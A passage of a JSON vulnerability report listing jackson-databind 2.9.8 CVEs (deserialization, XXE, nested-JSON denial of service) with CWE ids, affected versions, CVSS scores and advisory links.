on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11619"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11619"},{"summary":"NetApp Advisory ntap-20200511-0004","url":"https://security.netapp.com/advisory/ntap-20200511-0004"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11619/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-25649"]}],"cve":"CVE-2020-25649","cwe":{"id":"611","name":"Improper Restriction of XML External Entity Reference"},"discovery_date":"2021-02-18T20:51:54","ids":[{"system_name":"CVE Record","text":"CVE-2020-25649"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210108-0007"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1887664"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"XML External Entity (XXE) Injection in Jackson Databind"},{"category":"details","details":"Vulnerability Details","text":"# XML External Entity (XXE) Injection in Jackson Databind A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0.0|<2.9.10.7"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.7"]},"references":[{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1887664"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r78d53a0a269c18394daf5940105dc8c7f9a2399503c2e78be20abe7e@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7cb5b4b3e4bd41a8042e5725b7285877a17bcbf07f4eb3f7b316af60@%3Creviews.iotdb.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r86c78bf7656fdb2dab69cbf17f3d7492300f771025f1a3a65d5e5ce5@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8764bb835bcb8e311c882ff91dd3949c9824e905e880930be56f6ba3@%3Cuser.spark.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8937a7160717fe8b2221767163c4de4f65bc5466405cb1c5310f9080@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8ae961c80930e2717c75025414ce48a432cea1137c02f648b1fb9524@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r900d4408c4189b376d1ec580ea7740ea6f8710dc2f0b7e9c9eeb5ae0@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r90d1e97b0a743cf697d89a792a9b669909cc5a1692d1e0083a22e66c@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r91722ecfba688b0c565675f8bf380269fde8ec62b54d6161db544c22@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r94c7e86e546120f157264ba5ba61fd29b3a8d530ed325a9b4fa334d7@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r95a297eb5fd1f2d3a2281f15340e2413f952e9d5503296c3adc7201a@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98bfe3b90ea9408f12c4b447edcb5638703d80bc782430aa0c210a54@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra1157e57a01d25e36b0dc17959ace758fc21ba36746de29ba1d8b130@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra409f798a1e5a6652b7097429b388650ccd65fd958cee0b6f69bba00@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra95faf968f3463acb3f31a6fbec31453fc5045325f99f396961886d3@%3Cissues.flink.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/raf13235de6df1d47a717199e1ecd700dff3236632f5c9a1488d9845b@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb674520b9f6c808c1bf263b1369e14048ec3243615f35cfd24e33604@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rbf4ce74b0d1fa9810dec50ba3ace0caeea677af7c27a97111c06ccb7@%3Cusers.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc15e90bbef196a5c6c01659e015249d6c9a73581ca9afb8aeecf00d2@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc82ff47853289e9cd17f5cfbb053c04cafc75ee32e3d7223963f83bb@%3Cdev.knox.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc88f2fa2b7bd6443921727aeee7704a1fb02433e722e2abf677e0d3d@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc959cdb57c4fe198316130ff4a5ecbf9d680e356032ff2e9f4f05d54@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd317f15a675d114dbf5b488d27eeb2467b4424356b16116eb18a652d@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd57c7582adc90e233f23f3727db3df9115b27a823b92374f11453f34@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd6f6bf848c2d47fa4a85c27d011d948778b8f7e58ba495968435a0b3@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdca8711bb7aa5d47a44682606cd0ea3497e2e922f22b7ee83e81e6c1@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf9a34726482222c90d50ae1b9847881de67dde8cfde4999633d2cdc@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re16f81d3ad49a93dd2f0cba9f8fc88e5fb89f30bf9a2ad7b6f3e69c1@%3Ccommits.karaf.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re96dc7a13e13e56190a5d80f9e5440a0d0c83aeec6467b562fbf2dca@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1809a1374041a969d77afab21fc38925de066bc97e86157d3ac3402@%3Ccommits.karaf.apache.org%3E"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6X2UT4X6M7DLQYBOOHMXBWGYJ65RL2CT"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-25649"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-25649"},{"summary":"NetApp Advisory ntap-20210108-0007","url":"https://security.netapp.com/advisory/ntap-20210108-0007"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0.0|<2.9.10.7"]}],"title":"CVE-2020-25649/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-8840"]}],"cve":"CVE-2020-8840","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-03-04T20:52:14","ids":[{"system_name":"CVE Record","text":"CVE-2020-8840"},{"system_name":"Oracle Advisory","text":"cpuapr2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Huawei Advisory","text":"huawei-sa-20200610-01-fastjason-en"},{"system_name":"NetApp Advisory","text":"ntap-20200327-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of Untrusted Data in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of Untrusted Data in jackson-databind FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5 and 2.9.x before 2.9.10.2 lacks certain xbean-reflect/JNDI blocking, as demonstrated by org.apache.xbean.propertyeditor.JndiConverter."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.3"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.3"]},"references":[{"summary":"Huawei Advisory huawei-sa-20200610-01-fastjason-en","url":"http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-01-fastjason-en"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r078e68a926ea6be12e8404e47f45aabf04bb4668e8265c0de41db6db@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1c09b9551f6953dbeca190a4c4b78198cdbb9825fce36f96fe3d8218@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r1efc776fc6ce3387593deaa94bbdd296733b1b01408a39c8d1ab9e0e@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2fa8046bd47fb407ca09b5107a80fa6147ba4ebe879caae5c98b7657@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r319f19c74e06c201b9d4e8b282a4e4b2da6dcda022fb46f007dd00d3@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3539bd3a377991217d724879d239e16e86001c54160076408574e1da@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3d20a2660b36551fd8257d479941782af4a7169582449fac1704bde2@%3Ccommits.druid.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r428d068b2a4923f1a5a4f5fc6381b95205cfe7620169d16db78e9c71@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r446646c5588b10f5e02409ad580b12f314869009cdfbf844ca395cec@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r46bebdeb59b8b7212d63a010ca445a9f5c4e9d64dcf693cab6f399d3@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5d8bea8e9d17b6efcf4a0e4e194e91ef46a99f505777a31a60da2b38@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r65ee95fa09c831843bac81eaa582fdddc2b6119912a72d1c83a9b882@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6fdd4c61a09a0c89f581b4ddb3dc6f154ab0c705fcfd0a7358b2e4e5@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7762d69e85c58d6948823424017ef4c08f47de077644277fa18cc116@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7e5c10534ed06bf805473ac85e8412fe3908a8fa4cabf5027bf11220@%3Cdev.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8170007fd9b263d65b37d92a7b5d7bc357aedbb113a32838bc4a9485@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8e96c340004b7898cad3204ea51280ef6e4b553a684e1452bf1b18b1@%3Cjira.kafka.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r94930e39b60fff236160c1c4110fe884dc093044b067aa5fc98d7ee1@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9e59ebaf76fd00b2fa3ff5ebf18fe075ca9f4376216612c696f76718@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ecf211c22760b00967ebe158c6ed7dba9142078e2a630ab8904a5b7@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra275f29615f35d5b40106d1582a41e5388b2a5131564e9e01a572987@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rac5ee5d686818be7e7c430d35108ee01a88aae54f832d32f62431fd1@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb43f9a65150948a6bebd3cb77ee3e105d40db2820fd547528f4e7f89@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb5eedf90ba3633e171a2ffdfe484651c9490dc5df74c8a29244cbc0e@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb73708bf714ed6dbc1212da082e7703e586077f0c92f3940b2e82caf@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb99c7321eba5d4c907beec46675d52827528b738cfafd48eb4d862f1@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc717fd6c65190f4e592345713f9ef0723fb7d71f624caa2a17caa26a@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcc72b497e3dff2dc62ec9b89ceb90bc4e1b14fc56c3c252a6fcbb013@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdea588d4a0ebf9cb7ce8c3a8f18d0d306507c4f8ba178dd3d20207b8@%3Cdev.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8840"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8840"},{"summary":"NetApp Advisory ntap-20200327-0002","url":"https://security.netapp.com/advisory/ntap-20200327-0002"},{"summary":"Oracle Advisory cpuapr2020","url":"https://www.oracle.com/security-alerts/cpuapr2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.3"]}],"title":"CVE-2020-8840/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36518"]}],"cve":"CVE-2020-36518","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-03-12T00:00:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-36518"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"NetApp Advisory","text":"ntap-20220506-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deeply nested json in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deeply nested json in jackson-databind jackson-databind is a data-binding package for the Jackson Data Processor. jackson-databind allows a Java stack overflow exception and denial of service via a large depth of nested objects."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36518"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36518"},{"summary":"NetApp Advisory ntap-20220506-0004","url":"https://security.netapp.com/advisory/ntap-20220506-0004"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2020-36518/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-11112"]}],"cve":"CVE-2020-11112","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-10T21:12:41","ids":[{"system_name":"CVE Record","text":"CVE-2020-11112"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp 